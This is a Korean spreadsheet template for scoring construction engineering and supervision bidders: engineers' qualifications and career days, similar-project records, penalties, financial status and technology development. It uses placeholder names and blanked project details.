C8: 성 명 | D8: 분 야 | E8: 등 급 | F8: 해당분야 | H8: 직무분야 | J8: 교육훈련 및 기술자격 | K8: 면접 (발표) | L8: 계 (60)
F9: 설계,시공,시험 검사,사업관리, 유지관리,감독,감리 | M9: 금액 (억원) | N9: 점 수 | O9: 입찰참가제한 등 (7) | P9: 부실벌점 (5) | Q9: 재정 상태 (3) | R9: 개발활용실적 (3) | S9: 투자실적 (7) | T9: 건설사업관리용역업자 (3) | U9: 참여기술자 (2) | W9: 건설 기술인 신규 고용률 | X9: 공사비절감기여 | Y9: 부 패 행 위
F10: 년월 | G10: 점수 | H10: 년수 | I10: 점수 | J10: 점수 | K10: 점수
A11: (평가대상자) | L11: =L12+((L13+L14+L15)/3)+L16 -> 56.4 | M11: ='6. 유사용역수행실적'!L38/100 -> 126.36 | N11: =IF(M11>=30,10,IF(M11>=20,9,IF(M11>=10,8,0))) -> 10 | O11: 7 | P11: 5 | Q11: 3 | R11: ='10. 건설기술개발활용실적'!E10 -> 3 | S11: ='9. 재정상태,투자실적'!E16 -> 7 | T11: ='12. 교체빈도'!H9 -> 3 | U11: ='12. 교체빈도'!H21 -> 2 | V11: =L11+N11+O11+P11+Q11+R11+S11+T11+U11 -> 96.4 | W11: ='13.건설기술인 신규고용률'!Q5 -> 0.4 | Z11: =SUM(V11:X11)-Y11 -> 96.8
A12: 상주 | B12: 책임 | C12: ='5. 참여기술자 경력사항'!C6 -> 홍길동 | D12: ='5. 참여기술자 경력사항'!D6 -> 건축 | F12: ='5. 참여기술자 경력사항'!I6 -> 18.082192 | G12: =IF(F12>=9,15,IF(F12>=7,13.5,IF(F12>=5,12,IF(F12>=3,10.5,9)))) -> 15 | H12: ='5. 참여기술자 경력사항'!G6 -> 5.7534247 | I12: =IF(E12="특급",IF(H12>=15,9,IF(H12>=13,8.1,IF(H12>=11,7.2,IF(H12>=9,6.3,5.4)))),IF(H12>=12,9,IF(H12>=10,8.1,IF(H12>=8,7.2,IF(H12>=6,6.3,5.4))))) -> 5.4 | J12: 1 | K12: 0 | L12: =G12+I12+J12+K12 -> 21.4
B13: 보조 | C13: ='5. 참여기술자 경력사항'!C7 -> 안중근 | D13: ='5. 참여기술자 경력사항'!D7 -> 건축 | F13: ='5. 참여기술자 경력사항'!I7 -> 200 | G13: =IF(F13>=24,15,IF(F13>=18,13.5,IF(F13>=12,12,IF(F13>=6,10.5,9)))) -> 15 | H13: ='5. 참여기술자 경력사항'!G7 -> 16.438356 | I13: =IF(E13="특급",IF(H13>=10,9,IF(H13>=8,8.1,IF(H13>=6,7.2,IF(H13>=4,6.3,5.4)))),IF(E13="고급",(IF(H13>=8,9,IF(H13>=6,8.1,IF(H13>=4,7.2,IF(H13>=2,6.3,5.4))))),(IF(H13>=6,9,IF(H13>=4,8.1,IF(H13>=2,7.2,6.3)))))) -> 9 | J13: 1 | K13: 0 | L13: =G13+I13+J13+K13 -> 25
B14: 보조 | C14: ='5. 참여기술자 경력사항'!C8 -> 김 구 | D14: ='5. 참여기술자 경력사항'!D8 -> 토목 | F14: ='5. 참여기술자 경력사항'!I8 -> 200 | G14: =IF(F14>=24,15,IF(F14>=18,13.5,IF(F14>=12,12,IF(F14>=6,10.5,9)))) -> 15 | H14: ='5. 참여기술자 경력사항'!G8 -> 16.438356 | I14: =IF(E14="특급",IF(H14>=10,9,IF(H14>=8,8.1,IF(H14>=6,7.2,IF(H14>=4,6.3,5.4)))),IF(E14="고급",(IF(H14>=8,9,IF(H14>=6,8.1,IF(H14>=4,7.2,IF(H14>=2,6.3,5.4))))),(IF(H14>=6,9,IF(H14>=4,8.1,IF(H14>=2,7.2,6.3)))))) -> 9 | J14: 1 | K14: 0 | L14: =G14+I14+J14+K14 -> 25
B15: 보조 | C15: ='5. 참여기술자 경력사항'!C9 -> 윤봉길 | D15: ='5. 참여기술자 경력사항'!D9 -> 기계 | F15: ='5. 참여기술자 경력사항'!I9 -> 200 | G15: =IF(F15>=24,15,IF(F15>=18,13.5,IF(F15>=12,12,IF(F15>=6,10.5,9)))) -> 15 | H15: ='5. 참여기술자 경력사항'!G9 -> 16.438356 | I15: =IF(E15="특급",IF(H15>=10,9,IF(H15>=8,8.1,IF(H15>=6,7.2,IF(H15>=4,6.3,5.4)))),IF(E15="고급",(IF(H15>=8,9,IF(H15>=6,8.1,IF(H15>=4,7.2,IF(H15>=2,6.3,5.4))))),(IF(H15>=6,9,IF(H15>=4,8.1,IF(H15>=2,7.2,6.3)))))) -> 9 | J15: 1 | K15: 0 | L15: =G15+I15+J15+K15 -> 25
A16: 비상주 | B16: 보조 | C16: ='5. 참여기술자 경력사항'!C10 -> 허 준 | D16: ='5. 참여기술자 경력사항'!D10 -> 건축 | F16: ='5. 참여기술자 경력사항'!I10 -> 16.438356 | G16: =IF(F16>=9,6,IF(F16>=7,5.4,IF(F16>=5,4.8,IF(F16>=3,4.2,3.6)))) -> 6 | H16: ='5. 참여기술자 경력사항'!$G$10 -> 16.438356 | I16: =IF(H16>=15,3,IF(H16>=13,2.4,IF(H16>=11,1.8,IF(H16>=9,1.2,0.6)))) -> 3 | J16: 1 | L16: =G16+I16+J16+K16 -> 10

Sheet 3. 공동수급체결 협정현황
A1: 3. 공동수급협정 체결현황
A3: 구분 | B3: 업 체 명 | C3: 면허사항 | E3: 대표자 | F3: 전화 | G3: 출자비율 | I3: 비고
A4: 공동이행 | C4: 입찰공고시 요구한 면허사항 기재
A17: 분담이행 | B17: 업 체 명 | C17: 면허사항 | E17: 대표자 | F17: 전화 | G17: 분담내용 | I17: 비고
G18: 업종 | H18: 비율
C19: 입찰공고시 요구한 면허사항 기재
A27: 계
A29: 붙임 : 1. 공동수급협정서(나라장터 시스템으로 승인 처리한 출력물) 1부.
A30: 2. 단독이행시는 첨부물 필요없음.

Sheet 4. 참여기술자 자격사항
A1: 4. 참여기술자 자격사항
A3: 구분 | C3: 소속 (회사명) | D3: 이 름 | E3: 분야 | F3: 등 급 | G3: 자격명 | H3: 학력내용 | J3: 교 육 수료일자 | K3: 소속회사
H4: 최종학력 | I4: 졸업일 또는 학위취득일
A5: 상주 | B5: 책임
B6: 보조
B7: 보조
B8: 보조
B9: 보조
B10: 보조
B11: 보조
A12: 비상주 | B12: 책임
B13: 보조
B14: 보조
B15: 보조
B16: 보조
B17: 보조
B18: 보조
B19: 보조
A21: * 상주책임감리원의 자격사항에 따라 아래 배점에 의거 점수 기재→ | H21: 0.5
A23: 구 분
A24: 당해 전문분야의 기술사 또는 건축사
A25: 당해 전문분야의 기사
A26: 당해 전문분야의 산업기사
A28: * 비평가 대상 기술자는 비실명이며, 사업수행능력평가자료를 제출할 필요가 없습니다.
A29: * 평가대상참여기술자(책임기술자 제외)중 수요기관 지정 평가기술자일 경우 가점(입찰공고문 별도 명시)
A31: 붙임 1. 건설기술자 보유증명서 1부.

Sheet 5. 참여기술자 경력사항
B1: 5. 참여감리원 경력사항
A3: 구분 | C3: 성명 | D3: 분야 | E3: 등급 | F3: 직무분야 경력조사표 | H3: 해당분야 경력조사표
F5: 일수 | G5: 년수 | H5: 일수 | I5: 년 개월
A6: 상주 | B6: 책임 | C6: 홍길동 | D6: 건축 | E6: 특급 | F6: ='5-1. 참여기술자 해당(직무)분야경력'!G43 -> 2100 | G6: =F6/365 -> 5.7534247 | H6: ='5-1. 참여기술자 해당(직무)분야경력'!G34 -> 6600 | I6: =H6/365 -> 18.082192
B7: 분야별 | C7: 안중근 | D7: 건축 | E7: 특급 | F7: 6000 | G7: =F7/365 -> 16.438356 | H7: =F7 -> 6000 | I7: =H7/30 -> 200
B8: 분야별 | C8: 김 구 | D8: 토목 | E8: 특급 | F8: 6000 | G8: =F8/365 -> 16.438356 | H8: =F8 -> 6000 | I8: =H8/30 -> 200
B9: 분야별 | C9: 윤봉길 | D9: 기계 | E9: 특급 | F9: 6000 | G9: =F9/365 -> 16.438356 | H9: =F9 -> 6000 | I9: =H9/30 -> 200
A10: 기술지원 | C10: 허 준 | D10: 건축 | E10: 특급 | F10: 6000 | G10: =F10/365 -> 16.438356 | H10: =F10 -> 6000 | I10: =H10/365 -> 16.438356
A13: * 평가대상 기술자에 대하여 작성하시면 됨
A15: 붙임 1.건설기술자 경력증명서(원본) 1부.

Sheet 5-1. 참여기술자 해당(직무)분야경력
A1: 5-1. 해당분야 경력현황
A2: ★ 경력증명서의 용역명 등 해당사항에 표시(형광펜, 사인펜 등)하여 주시기 바랍니다.
A3: 이 름 | B3: 생년월일 | C3: 용역명 | D3: 발주처 | E3: 참여기간 | G3: 참여일수 | I3: 용역완수일
A4: ooo | B4: 00.00.00. | E4: 23012 | F4: 23651 | G4: =F4-E4+1 -> 640
E5: 23680 | F5: 24226 | G5: =IF(E5>F4,F5-E5+1,F5-F4) -> 547
E6: 27061 | F6: 27363 | G6: =IF(E6>F5,F6-E6+1,F6-F5) -> 303
E7: 27364 | F7: 27728 | G7: =IF(E7>F6,F7-E7+1,F7-F6) -> 365
E8: 27729 | F8: 28125 | G8: =IF(E8>F7,F8-E8+1,F8-F7) -> 397
E9: 28126 | F9: 28490 | G9: =IF(E9>F8,F9-E9+1,F9-F8) -> 365
E10: 28491 | F10: 28855 | G10: =IF(E10>F9,F10-E10+1,F10-F9) -> 365
E11: 28856 | F11: 29189 | G11: =IF(E11>F10,F11-E11+1,F11-F10) -> 334
E12: 29190 | F12: 29586 | G12: =IF(E12>F11,F12-E12+1,F12-F11) -> 397
E13: 29587 | F13: 30316 | G13: =IF(E13>F12,F13-E13+1,F13-F12) -> 730
E14: 32874 | F14: 33969 | G14: =IF(E14>F13,F14-E14+1,F14-F13) -> 1096
E15: 33970 | F15: 34395 | G15: =IF(E15>F14,F15-E15+1,F15-F14) -> 426 | I15: 34395
E16: 34060 | F16: 34120 | G16: =IF(E16>F15,F16-E16+1,F16-F15) -> -275 | H16: 삭제 | I16: 34120 | J16: 용역완수일이 1994-03-02 이전이므로 중첩되는 용역임
E17: 34121 | F17: 34313 | G17: =IF(E17>F16,F17-E17+1,F17-F16) -> 193 | H17: 삭제 | I17: 34313
E18: 34121 | F18: 34365 | G18: =IF(E18>F17,F18-E18+1,F18-F17) -> 52 | H18: 삭제 | I18: 34365
E19: 34396 | F19: 35060 | G19: =IF(E19>F18,F19-E19+1,F19-F18) -> 665
A34: 계 | B34: 해당분야경력 | G34: =SUM(G4:G33) -> 6600
A37: 5-2. 직무분야 경력현황
A39: 이 름 | B39: 생년월일 | C39: 직무분야 | D39: 전문분야 | G39: 참여일수
A40: ooo | B40: 00.00.00. | C40: 건축 | D40: 구조 | G40: 2000
C41: 건축 | G41: 100
A43: 계 | B43: 직무분야경력 | G43: =SUM(G40:G42) -> 2100
A45: * 주의사항
A46: - 해당분야 경력은 경력증명서(관련협회) 상에 기재된 근무기간에서 중복일수를 제외한 실제 참여기간을 입력하여 주시기바랍니다.

Sheet 6. 유사용역수행실적
A1: 6. 용역수행실적
A2: 구 분 | C2: 발 주 청 | D2: 용 역 명 | E2: 건설사업관리기간 | G2: 전체일수 (기성실적기간) | H2: 최종기성 실적기간 | I2: 적용일수 | J2: 실적 (백만원) | K2: 가중치 | L2: 인정실적 (백만원)
E3: 실적마감일 | F3: 45139
E4: 실적시작일 | F4: 44045
E5: 착공일 | F5: 준공일(예정)
A6: 완 료 | B6: 설계와 시공단계를 포함한 건설사업관리 | C6: ㅇㅇㅇㅇㅇ시 | D6: ㅇㅇㅇㅇㅇㅇ청사 신축공사 | E6: 44197 | F6: 44377 | G6: =(F6-E6)+1 -> 181 | I6: =ROUND((IF(F6<$F$4,0,IF(E6>=$F$4,(F6-E6+1),(F6-$F$4+1)))),0) -> 181 | J6: 500 | K6: 1 | L6: =ROUNDDOWN(J6*(I6/G6)*K6,0) -> 500
E7: 44256 | F7: 44986 | G7: =(F7-E7)+1 -> 731 | I7: =ROUND((IF(F7<$F$4,0,IF(E7>=$F$4,(F7-E7+1),(F7-$F$4+1)))),0) -> 731 | J7: 1200 | K7: 1 | L7: =ROUNDDOWN(J7*(I7/G7)*K7,0) -> 1200
E8: 44621 | F8: 44986 | G8: =(F8-E8)+1 -> 366 | I8: =ROUND((IF(F8<$F$4,0,IF(E8>=$F$4,(F8-E8+1),(F8-$F$4+1)))),0) -> 366 | J8: 1000 | K8: 1 | L8: =ROUNDDOWN(J8*(I8/G8)*K8,0) -> 1000
B9: 소계 | J9: =SUM(J6:J8) -> 2700 | L9: =SUM(L6:L8) -> 2700
B10: 설계단계의 건설사업관리 | D10: ㅇㅇ사업 건설사업관리 | E10: 44197 | F10: 44377 | G10: =(F10-E10)+1 -> 181 | I10: =ROUND((IF(F10<$F$4,0,IF(E10>=$F$4,(F10-E10+1),(F10-$F$4+1)))),0) -> 181 | J10: 500 | K10: 1 | L10: =ROUNDDOWN(J10*(I10/G10)*K10,0) -> 500
E11: 44256 | F11: 44986 | G11: =(F11-E11)+1 -> 731 | I11: =ROUND((IF(F11<$F$4,0,IF(E11>=$F$4,(F11-E11+1),(F11-$F$4+1)))),0) -> 731 | J11: 1200 | K11: 0.7 | L11: =ROUNDDOWN(J11*(I11/G11)*K11,0) -> 840
E12: 44621 | F12: 44986 | G12: =(F12-E12)+1 -> 366 | I12: =ROUND((IF(F12<$F$4,0,IF(E12>=$F$4,(F12-E12+1),(F12-$F$4+1)))),0) -> 366 | J12: 1000 | K12: 0.7 | L12: =ROUNDDOWN(J12*(I12/G12)*K12,0) -> 700
G13: =(F13-E13)+1 -> 1 | I13: =ROUND((IF(F13<$F$4,0,IF(E13>=$F$4,(F13-E13+1),(F13-$F$4+1)))),0) -> 0 | K13: 0.7 | L13: =ROUNDDOWN(J13*(I13/G13)*K13,0) -> 0
D14: ㅇㅇ사업 기본설계 | E14: 44256 | F14: 44986 | G14: =(F14-E14)+1 -> 731 | I14: =ROUND((IF(F14<$F$4,0,IF(E14>=$F$4,(F14-E14+1),(F14-$F$4+1)))),0) -> 731 | J14: 1200 | K14: 0.49 | L14: =ROUNDDOWN(J14*(I14/G14)*K14,0) -> 588
G15: =(F15-E15)+1 -> 1 | I15: =ROUND((IF(F15<$F$4,0,IF(E15>=$F$4,(F15-E15+1),(F15-$F$4+1)))),0) -> 0 | K15: 0.49 | L15: =ROUNDDOWN(J15*(I15/G15)*K15,0) -> 0
B16: 소계 | J16: =SUM(J10:J15)*0.7 -> 2730 | L16: =SUM(L10:L15) -> 2628
B17: 시공단계의 건설사업관리 | D17: ㅇㅇ사업 건설사업관리 | E17: 44197 | F17: 44377 | G17: =(F17-E17)+1 -> 181 | I17: =ROUND((IF(F17<$F$4,0,IF(E17>=$F$4,(F17-E17+1),(F17-$F$4+1)))),0) -> 181 | J17: 500 | K17: 1 | L17: =ROUNDDOWN(J17*(I17/G17)*K17,0) -> 500
E18: 44256 | F18: 44986 | G18: =(F18-E18)+1 -> 731 | I18: =ROUND((IF(F18<$F$4,0,IF(E18>=$F$4,(F18-E18+1),(F18-$F$4+1)))),0) -> 731 | J18: 500 | K18: 0.7 | L18: =ROUNDDOWN(J18*(I18/G18)*K18,0) -> 350
G19: =(F19-E19)+1 -> 1 | I19: =ROUND((IF(F19<$F$4,0,IF(E19>=$F$4,(F19-E19+1),(F19-$F$4+1)))),0) -> 0 | K19: 0.49 | L19: =ROUNDDOWN(J19*(I19/G19)*K19,0) -> 0
B20: 소계 | J20: =SUM(J17:J19)*0.4 -> 400 | L20: =SUM(L17:L19) -> 850
A21: 합계 | L21: =SUM(L9+L16+L20) -> 6178
A22: 진 행 중 | B22: 설계와 시공단계를 포함한 건설사업관리 | D22: ㅇㅇ사업 건설사업관리 | E22: 44256 | F22: 44926 | G22: =(H22-E22)+1 -> 366 | H22: 44621 | I22: =ROUND(IF(AND(H22<=$F$3,E22<=$F$4),H22-$F$4+1,IF(AND(H22<=$F$3,E22>=$F$4),H22-E22+1,IF(AND(H22>=$F$3,E22>=$F$4),$F$3-E22+1,IF(AND(H22>=$F$3,E22<=$F$4),$F$3-$F$4+1,)))),0) -> 366 | J22: 500 | K22: 1 | L22: =ROUNDDOWN(J22*(I22/G22)*K22,0) -> 500
E23: 44407 | F23: 44926 | G23: =(H23-E23)+1 -> 215 | H23: 44621 | I23: =ROUND(IF(AND(H23<=$F$3,E23<=$F$4),H23-$F$4+1,IF(AND(H23<=$F$3,E23>=$F$4),H23-E23+1,IF(AND(H23>=$F$3,E23>=$F$4),$F$3-E23+1,IF(AND(H23>=$F$3,E23<=$F$4),$F$3-$F$4+1,)))),0) -> 215 | J23: 500 | K23: 1 | L23: =ROUNDDOWN(J23*(I23/G23)*K23,0) -> 500
E24: 44407 | F24: 44926 | G24: =(H24-E24)+1 -> 428 | H24: 44834 | I24: =ROUND(IF(AND(H24<=$F$3,E24<=$F$4),H24-$F$4+1,IF(AND(H24<=$F$3,E24>=$F$4),H24-E24+1,IF(AND(H24>=$F$3,E24>=$F$4),$F$3-E24+1,IF(AND(H24>=$F$3,E24<=$F$4),$F$3-$F$4+1,)))),0) -> 428 | J24: 500 | K24: 1 | L24: =ROUNDDOWN(J24*(I24/G24)*K24,0) -> 500
E25: 44256 | F25: 44926 | G25: =(H25-E25)+1 -> 579 | H25: 44834 | I25: =ROUND(IF(AND(H25<=$F$3,E25<=$F$4),H25-$F$4+1,IF(AND(H25<=$F$3,E25>=$F$4),H25-E25+1,IF(AND(H25>=$F$3,E25>=$F$4),$F$3-E25+1,IF(AND(H25>=$F$3,E25<=$F$4),$F$3-$F$4+1,)))),0) -> 579 | J25: 500 | K25: 1 | L25: =ROUNDDOWN(J25*(I25/G25)*K25,0) -> 500
B26: 소계 | J26: =SUM(J22:J25) -> 2000 | L26: =SUM(L22:L25) -> 2000
B27: 설계단계의 건설사업관리 | D27: ㅇㅇ사업 건설사업관리 | E27: 44256 | F27: 44926 | G27: =(H27-E27)+1 -> 366 | H27: 44621 | I27: =ROUND(IF(AND(H27<=$F$3,E27<=$F$4),H27-$F$4+1,IF(AND(H27<=$F$3,E27>=$F$4),H27-E27+1,IF(AND(H27>=$F$3,E27>=$F$4),$F$3-E27+1,IF(AND(H27>=$F$3,E27<=$F$4),$F$3-$F$4+1,)))),0) -> 366 | J27: 500 | K27: 1 | L27: =ROUNDDOWN(J27*(I27/G27)*K27,0) -> 500
E28: 44407 | F28: 44926 | G28: =(H28-E28)+1 -> 215 | H28: 44621 | I28: =ROUND(IF(AND(H28<=$F$3,E28<=$F$4),H28-$F$4+1,IF(AND(H28<=$F$3,E28>=$F$4),H28-E28+1,IF(AND(H28>=$F$3,E28>=$F$4),$F$3-E28+1,IF(AND(H28>=$F$3,E28<=$F$4),$F$3-$F$4+1,)))),0) -> 215 | J28: 1200 | K28: 0.7 | L28: =ROUNDDOWN(J28*(I28/G28)*K28,0) -> 840
E29: 44407 | F29: 44926 | G29: =(H29-E29)+1 -> 428 | H29: 44834 | I29: =ROUND(IF(AND(H29<=$F$3,E29<=$F$4),H29-$F$4+1,IF(AND(H29<=$F$3,E29>=$F$4),H29-E29+1,IF(AND(H29>=$F$3,E29>=$F$4),$F$3-E29+1,IF(AND(H29>=$F$3,E29<=$F$4),$F$3-$F$4+1,)))),0) -> 428 | J29: 1200 | K29: 0.7 | L29: =ROUNDDOWN(J29*(I29/G29)*K29,0) -> 840
D30: ㅇㅇ사업 기본설계 | E30: 44256 | F30: 44926 | G30: =(H30-E30)+1 -> 579 | H30: 44834 | I30: =ROUND(IF(AND(H30<=$F$3,E30<=$F$4),H30-$F$4+1,IF(AND(H30<=$F$3,E30>=$F$4),H30-E30+1,IF(AND(H30>=$F$3,E30>=$F$4),$F$3-E30+1,IF(AND(H30>=$F$3,E30<=$F$4),$F$3-$F$4+1,)))),0) -> 579 | J30: 1200 | K30: 0.7 | L30: =ROUNDDOWN(J30*(I30/G30)*K30,0) -> 840
D31: ㅇㅇ사업 기본설계 | E31: 44407 | F31: 44926 | G31: =(H31-E31)+1 -> 428 | H31: 44834 | I31: =ROUND(IF(AND(H31<=$F$3,E31<=$F$4),H31-$F$4+1,IF(AND(H31<=$F$3,E31>=$F$4),H31-E31+1,IF(AND(H31>=$F$3,E31>=$F$4),$F$3-E31+1,IF(AND(H31>=$F$3,E31<=$F$4),$F$3-$F$4+1,)))),0) -> 428 | J31: 1200 | K31: 0.49 | L31: =ROUNDDOWN(J31*(I31/G31)*K31,0) -> 588
G32: =(H32-E32)+1 -> 1 | K32: 0.49 | L32: =ROUNDDOWN(J32*(I32/G32)*K32,0) -> 0
B33: 소계 | J33: =SUM(J27:J32)*0.7 -> 3710 | L33: =SUM(L27:L32) -> 3608
B34: 시공단계의 건설사업관리 | E34: 44256 | F34: 44926 | G34: =(H34-E34)+1 -> 366 | H34: 44621 | I34: =ROUND(IF(AND(H34<=$F$3,E34<=$F$4),H34-$F$4+1,IF(AND(H34<=$F$3,E34>=$F$4),H34-E34+1,IF(AND(H34>=$F$3,E34>=$F$4),$F$3-E34+1,IF(AND(H34>=$F$3,E34<=$F$4),$F$3-$F$4+1,)))),0) -> 366 | J34: 500 | K34: 1 | L34: =ROUNDDOWN(J34*(I34/G34)*K34,0) -> 500
E35: 44256 | F35: 44926 | G35: =(H35-E35)+1 -> 366 | H35: 44621 | I35: =ROUND(IF(AND(H35<=$F$3,E35<=$F$4),H35-$F$4+1,IF(AND(H35<=$F$3,E35>=$F$4),H35-E35+1,IF(AND(H35>=$F$3,E35>=$F$4),$F$3-E35+1,IF(AND(H35>=$F$3,E35<=$F$4),$F$3-$F$4+1,)))),0) -> 366 | J35: 500 | K35: 0.7 | L35: =ROUNDDOWN(J35*(I35/G35)*K35,0) -> 350
B36: 소계 | J36: =SUM(J34:J35)*0.4 -> 400 | L36: =SUM(L34:L35) -> 850
A37: 합계 | L37: =SUM(L26+L33+L36) -> 6458
A38: 총계 | L38: =L21+L37 -> 12636
A40: *흰색 부분에 기재바랍니다.(색이 채워져 있는 부분은 자동 계산됨)
A41: ★ 실적증명서 등 증명서류의 해당사항에 표시(형광펜, 사인펜 등)하여 주시기 바랍니다.
A43: 붙임 : 건설기술용역 실적 확인서 1부.
B44: 설계와 시공단계를 포함한 건설사업관리 경력일 경우 : 입찰공고서, 과업지시서 등의 설계와 시공단계 건설사업관리를 증빙할 수 있는 서류를 첨부하셔야 합니다.

Sheet 7. 입찰참가제한 및 업무정지
A1: 7. 입찰참가제한 및 업무정지 현황
A3: 구분(회사명) | B3: 입찰참가제한 | C3: 업무정지 | D3: 업무정지 사유 | E3: 계(월) | F3: 1개월마다 | G3: 감점
A6: 소계
A8: (감리원) | B8: 입찰참가제한 | C8: 업무정지 | D8: 업무정지 사유 | E8: 계(월) | F8: 3개월마다 | G8: 감점
A16: 소계
A17: 계
A18: 배점 | G18: 7

Sheet 8. 부실벌점
A1: 8. 부실벌점
A2: 회사명 또는 감리원 | B2: 합산벌점 | C2: 감점
G3: 조달청 건설엔지니어링사업자 사업수행능력 세부평가기준(2025. 11. 28. 시행 2026. 1. 1.)
G4: ㅇ 참여업체 및 참여건설기술인이 시행령 제87조에 따라 벌점을 받은 경우 시행령 [별표8]에서 정하는 기준에 따라 감점
G6: 합산벌점 | H6: 0.5점 미만 | I6: 0.5점 이상 1점 미만 | J6: 1점 이상 2점 미만 | K6: 2점 이상 5점 미만 | L6: 5점 이상 10점 미만 | M6: 10점 이상 15점 미만 | N6: 15점 이상 20점 미만 | O6: 20점 이상
G7: 점수(감점) | H7: 0.1 | I7: 0.2 | J7: 0.3 | K7: 0.5 | L7: 1 | M7: 2 | N7: 3 | O7: 5
A12: 첨부 : 관련협회 증명서 각1부

Sheet 9. 재정상태,투자실적
A1: 9. 재정상태,투자실적
A2: 1. 회 사 명 :
A3: 2. 설 립 년 도 :
A4: (재정상태 건실도)
A5: 신용정보업체 | B5: 신용평가등급 | C5: 등급평가일 | D5: 등급유효기간 | E5: 재무결산기준일 | F5: 평점
A12: (투자실적)
A13: 최근 3개년도 기술개발투자금액 | E13: 평점
A14: 1차년도(2000) | B14: 2차년도(2001) | C14: 3차년도(2002) | D14: 계(A)
A15: 185700000 | B15: 125000000 | C15: 275000000 | D15: =SUM(A15:C15) -> 585700000
A16: 최근 3개년 매출액 | E16: 7
A17: =A14 -> 1차년도(2000) | B17: =B14 -> 2차년도(2001) | C17: =C14 -> 3차년도(2002) | D17: 계(B) | E17: 비율(A/B)
A18: 3251000000 | B18: 2157000000 | C18: 4250000000 | D18: =SUM(A18:C18) -> 9658000000 | E18: =D15/D18 -> 0.060644026
A21: 붙임 : 1. 최근 3년간의 재무상태 검토보고서 1부
A22: 2. 최근 3년간의 정기결산서의 재무제표(손익계산서, 원가명세서, 합계잔액시산표)
A23: 3. 최근 3년간의 연구 및 인력개발에 관한 명세서 1부.
A24: 주 ) 1. 위의 서류는 원본 제출이 원칙이나 관련서류를 기제출한 업체는 사본도 가능함
A25: 2. 붙임의 서류를 첨부하지 않았을 경우 평가에서 제외함
A26: * 관련서류는 공인회계사법 제7조에 의하여 등록한 공인회계사가 확인.분석.검토하여야 함

Sheet 10. 건설기술개발활용실적
A1: 10. 건설기술개발활용실적(합계)
A3: 회 사 명 | B3: 신기술 개발실적 | C3: 신기술 활용실적 | D3: 특허 활용실적 | E3: 비 고 (지분율)
A4: ㅇㅇㅇㅇㅇㅇㅇㅇ | B4: ='10-1. 건설기술개발활용실적'!L11*'10. 건설기술개발활용실적'!E4 -> 4.2 | C4: ='10-1. 건설기술개발활용실적'!L20*E4 -> 0.7 | D4: ='10-1. 건설기술개발활용실적'!L27*E4 -> 0.21 | E4: 0.7
A5: ㅁㅁㅁㅁㅁㅁㅁㅁ | B5: ='10-1. 건설기술개발활용실적(공동수급)'!L11*'10. 건설기술개발활용실적'!E5 -> 1.8 | C5: ='10-1. 건설기술개발활용실적(공동수급)'!L20*E5 -> 0.3 | D5: ='10-1. 건설기술개발활용실적(공동수급)'!L27*E5 -> 0.09 | E5: 0.3
A10: 계 | E10: =ROUND(IF((SUM(B4:B9)+SUM(C4:C9)+(IF(SUM(D4:D9)>=1,1,SUM(D4:D9))))>=3,3,(SUM(B4:B9)+SUM(C4:C9)+(IF(SUM(D4:D9)>=1,1,SUM(D4:D9))))),2) -> 3

Sheet 10-1. 건설기술개발활용실적
A1: 10. 건설기술개발·활용실적
A2: ○ 개발실적
A3: 구분 | B3: 인 정 기관명 | C3: 개발내용 | D3: 등록번호 | E3: 보호기간 | J3: 기술 개발자수 | K3: 기준점수 | L3: 해당 점수
A5: 신기술 | B5: 국토부 | C5: ㅇㅇㅇㅇㅇㅇㅇㅇㅇ | D5: 제 ㅇㅇㅇ호 | E5: 37240 | F5: 38335 | J5: 1 | K5: 2 | L5: =K5/J5 -> 2
A7: 신기술 | B7: 국토부 | C7: ㅇㅇㅇㅇㅇㅇㅇㅇㅇ | D7: 제 ㅇㅇㅇ호 | E7: 37240 | F7: 38335 | J7: 1 | K7: 2 | L7: =K7/J7 -> 2
A9: 신기술 | B9: 국토부 | C9: ㅇㅇㅇㅇㅇㅇㅇㅇㅇ | D9: 제 ㅇㅇㅇ호 | E9: 37240 | F9: 38335 | J9: 1 | K9: 2 | L9: =K9/J9 -> 2
K11: 소계 | L11: =SUM(L5:L10) -> 6
A13: ○ 활용실적
A14: 구분 | B14: 인정 기관명 | C14: 개발내용 | D14: 지정번호 (활용년도) | E14: 고시일자 | F14: 만료일자 | G14: 실적건수(건) | H14: 사용실적 가중치 | J14: - | K14: 기준 점수 | L14: 해당 점수
G15: 실적금액(억원)
A16: 신기술 | C16: ㅇㅇㅇㅇㅇㅇㅇㅇㅇ | D16: 제ㅇㅇㅇ호 (2007) | E16: 38460 | F16: 41381 | G16: 3 | H16: 1 | K16: 0.5 | L16: =K16*H16 -> 0.5
G17: 20
A18: 신기술 | C18: ㅇㅇㅇㅇㅇㅇㅇㅇㅇ | D18: 제ㅇㅇㅇ호 (2008) | E18: 39190 | F18: 41381 | G18: 3 | H18: 1 | K18: 0.5 | L18: =K18*H18 -> 0.5
G19: 10
K20: 소계 | L20: =SUM(L16:L19) -> 1
A21: 구분 | B21: 인정 기관명 | C21: 개발내용 | D21: 등록번호 (활용년도) | E21: 출원일자 | F21: 존속(예정)기간 만료일 | G21: 실적건수(건) | H21: 사용실적 가중치 | I21: 경과기간 | J21: 경과기간 가중치 | K21: 기준 점수 | L21: 해당 점수
G22: 실적금액(억원)
A23: 특허 | C23: ㅇㅇㅇㅇㅇㅇㅇㅇㅇ | D23: 10-1100000 (2013) | E23: 40100 | F23: 41381 | G23: 5 | H23: 1 | I23: 1 | J23: 0.5 | K23: 0.3 | L23: =K23*H23*J23 -> 0.15
G24: 10
A25: 특허 | C25: ㅇㅇㅇㅇㅇㅇㅇㅇㅇ | D25: 10-1100000 (2013) | E25: 40100 | F25: 41381 | G25: 5 | H25: 1 | I25: 1 | J25: 0.5 | K25: 0.3 | L25: =K25*H25*J25 -> 0.15
G26: 10
K27: 소계 | L27: =SUM(L23:L26) -> 0.3
A29: 붙임 : 1. 신기술지정서 및 실적확인서 사본("사실과과 상위없음" 인감 날인)제출 가능
A30: 2. 특허증 사본(등록원부 및 최초 출원인 확인용은 원본)
A31: 3. 실용신안등록증 사본(등록원부 및 최초 출원인 확인용은 원본)
A32: 4. 건설신기술의 선행기술조사 관련 서류(국토교통과학기술진흥윈에 등재된 자료 등)_ 필요시 제출
A33: 주 ) 1. 위의 서류 증서는 사본제출이 가능하며 사본제출 시 사실과상이없음 명시하고 사용인감 날인바람
A34: 2. 위의 서류를 첨부하지 않았을 경우 평가에서 제외함

Sheet 10-1. 건설기술개발활용실적(공동수급)
A1: 10. 건설기술개발·활용실적
A2: ○ 개발실적
